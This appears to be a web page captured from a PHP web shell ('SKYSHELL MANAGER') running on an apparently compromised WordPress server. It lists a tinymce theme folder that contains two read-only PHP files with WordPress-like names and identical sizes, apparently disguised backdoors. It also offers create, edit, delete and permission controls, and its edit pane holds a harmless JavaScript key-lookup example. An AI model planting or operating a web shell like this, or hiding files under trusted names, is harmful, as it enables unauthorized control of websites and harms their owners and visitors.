📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: keys-with-dots.js
const get = require('..'); console.log(get({ files: { 'foo/bar.md': { b: 'c' } } }, 'files.foo/bar.md')); //=> { b: c } console.log(get({ 'a.b': { c: 'd' } }, 'a.b.c')); //=> 'd' console.log(get({ 'a.b': { c: { 'd.e': 'f' } } }, 'a.b.c.d.e')); //=> 'f'
Save